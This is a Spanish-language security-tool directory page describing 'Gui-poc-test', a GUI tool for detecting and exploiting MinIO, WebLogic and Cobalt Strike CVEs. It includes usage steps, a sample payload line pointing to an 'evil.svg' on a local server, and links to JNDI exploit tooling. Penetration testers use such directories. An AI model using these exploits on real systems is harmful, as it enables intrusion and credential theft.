Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Gui-poc-test — Una herramienta de prueba para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Herramientas/GitHubGitHub/romanc9/gui-poc-test
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónDesarrollo de Payloads
GitHubromanc9/gui-poc-test

Gui-poc-test

Una herramienta de prueba para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Ver Repositorio
2hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Gui-poc-test

Una herramienta de prueba para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Herramienta gráfica de detección y explotación de vulnerabilidades para estos tres tipos de vulnerabilidades

Notas importantes

  1. Ejecutar el jar requiere Java 8

  2. Orientado a un solo objetivo, no apto para escaneo de múltiples IPs

  3. Al empaquetar, la explotación de la vulnerabilidad de Weblogic requiere hacer referencia a wlfullclient.jar, debe agregarlo usted mismo

Uso

java -jar Gui-poc-test.jar

Método de uso: hay dos botones, detección y explotación. La interfaz de la herramienta proporciona indicaciones según la vulnerabilidad.

MinIO: Filtración de información

Ingrese el objetivo, no es necesario ingresar el puerto, valor predeterminado 9000, puede cambiarlo, consulte el código fuente GuiDemo.java:línea 144

Muestra MINIO_ROOT_USER y MINIO_ROOT_PASSWORD, etc.

image

Weblogic RCE

Ingrese la IP del objetivo, puerto, dirección del servidor LDAP

Detección:

image

Nota: La explotación de la vulnerabilidad requiere configurar su propio servidor LDAP (público)

  • Herramienta de servidor JNDI: use la herramienta JNDIExploit.jar para habilitar los servicios LDAP y WEB, consulte https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. Después de seleccionar la vulnerabilidad, se muestra por defecto el método de autocomprobación. Al ingresar el código de detección en el oyente de CS, puede verificar si la vulnerabilidad existe.
  2. Requisito previo para la explotación: haber obtenido localmente el troyano del objetivo (exe)
  3. Requisitos del entorno de ejecución: Windows, Python 3, pip3 instalar frida-tools
  4. Python ya está en las variables de entorno
  5. Configure su propio servidor para alojar el archivo SVG y el archivo JAR, accesible para el objetivo
  6. Ingrese la ruta absoluta del exe y la dirección del SVG, separados por un espacio, haga clic en ejecutar para realizar la contraofensiva.
  7. El contenido del archivo JAR se configura por sí mismo; el contenido de demostración es abrir la calculadora.
  8. El nombre predeterminado del troyano es beacon, se puede modificar, consulte el código fuente cve_2022_39197.py:línea 28

Ejemplo de payload: beacon.exe http://127.0.0.1:4444/evil.svg

Resultado: al ejecutar el troyano en Windows, el cliente de CS en macOS se conecta.

Al mismo tiempo, el lado de CS ejecuta el contenido del archivo JAR y abre la calculadora.

image

Windows registra la dirección de acceso de CS

image

Referencias

Principio: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

Parche de CS: https://github.com/burpheart/CVE-2022-39197-patch

Descargar herramienta